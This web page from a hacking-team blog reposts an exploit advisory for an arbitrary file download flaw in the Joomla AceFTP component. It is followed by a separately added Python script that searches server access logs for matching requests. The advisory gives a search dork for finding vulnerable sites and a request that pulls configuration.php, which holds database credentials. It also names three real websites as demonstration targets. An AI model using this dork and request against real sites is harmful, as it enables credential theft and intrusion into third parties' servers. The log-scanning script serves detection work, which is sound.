Joomla com aceftp Arbitrary File Download Vulnerability - cowok tersakiti team


Wednesday, March 1, 2017

Joomla com aceftp Arbitrary File Download Vulnerability





##############################################################
# Exploit Title: Joomla com aceftp Arbitrary File Download Vulnerability
# Exploit Author: howucan
# Website : http://howucan.gr
# Dork : inurl:/administrator/components/com_aceftp/
# Software Website : http://www.joomace.net/downloads/aceftp
# Version : ALL
# Date : 2016/08/15
# Tested on : Parrot Os 3.1
# Category: webapps

#
########################
# Description :
#
# AceFTP is a smart, fast and lightweight file manager component. It
# operates from Joomla back-end so you don't have to use any FTP program anymore.
########################
# POC :
#
#
http://localhost/path//administrator/components/com_aceftp/quixplorer/index.php?action=download&dir=&item=configuration.php&order=name&srt=yes
##############
# Demo1 :
www.iraqcoc.ir/administrator/components/com_aceftp/quixplorer/
index.php?action=download&dir=&item=configuration.php&order=name&srt=yes
# Demo2 :
www.diethneis-sxeseis.gr/site/administrator/components/
com_aceftp/quixplorer/
index.php?action=download&dir=&item=configuration.php&order=name&srt=yes
# Demo3 :
www.rederural.pt/administrator/components/com_aceftp/quixplorer/
index.php?action=download&dir=&item=configuration.php&order=name&srt=yes
#
################################
#
# PAOK G4 Salonika Punk Rock City
################################
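
To check whether a site running this component has already received requests of the POC's shape, the web server access log can be searched for the quixplorer download action. The script below is an added example, not part of the original advisory or of AceFTP; it assumes the Apache/nginx "combined" log format, and the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote

# Entry point named in the advisory's POC (compared lower-cased).
QUIX_PATH = "/administrator/components/com_aceftp/quixplorer/index.php"

# Assumption: Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def classify(line):
    """Return a finding for a request to the AceFTP download action, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    raw_path, _, query = m["target"].partition("?")
    # Decode %xx and collapse "//" (as in "path//administrator") before comparing.
    path = re.sub(r"/{2,}", "/", unquote(raw_path)).lower()
    if not path.endswith(QUIX_PATH):
        return None
    qs = parse_qs(query, keep_blank_values=True)
    if qs.get("action", [""])[0].lower() != "download":
        return None
    item = qs.get("item", [""])[0]
    served = m["status"] == "200"
    if served and item.lower().endswith("configuration.php"):
        severity = "critical"  # Joomla config (holds DB credentials) likely returned
    elif served:
        severity = "high"      # some other file was likely returned
    else:
        severity = "probe"     # request was made but not served
    return {"ip": m["ip"], "time": m["ts"], "item": item, "severity": severity}

def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [01/Mar/2017:10:02:11 +0000] "GET /administrator/components/com_aceftp/quixplorer/index.php?action=download&dir=&item=configuration.php&order=name&srt=yes HTTP/1.1" 200 2154 "-" "-"',
    '198.51.100.7 - - [01/Mar/2017:10:02:15 +0000] "GET /site//administrator/components/com_aceftp/quixplorer/index.php?action=download&dir=&item=configuration.php HTTP/1.1" 403 199 "-" "-"',
    '203.0.113.20 - - [01/Mar/2017:10:03:40 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 8012 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A "critical" finding means the database credentials in configuration.php should be treated as exposed and rotated.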
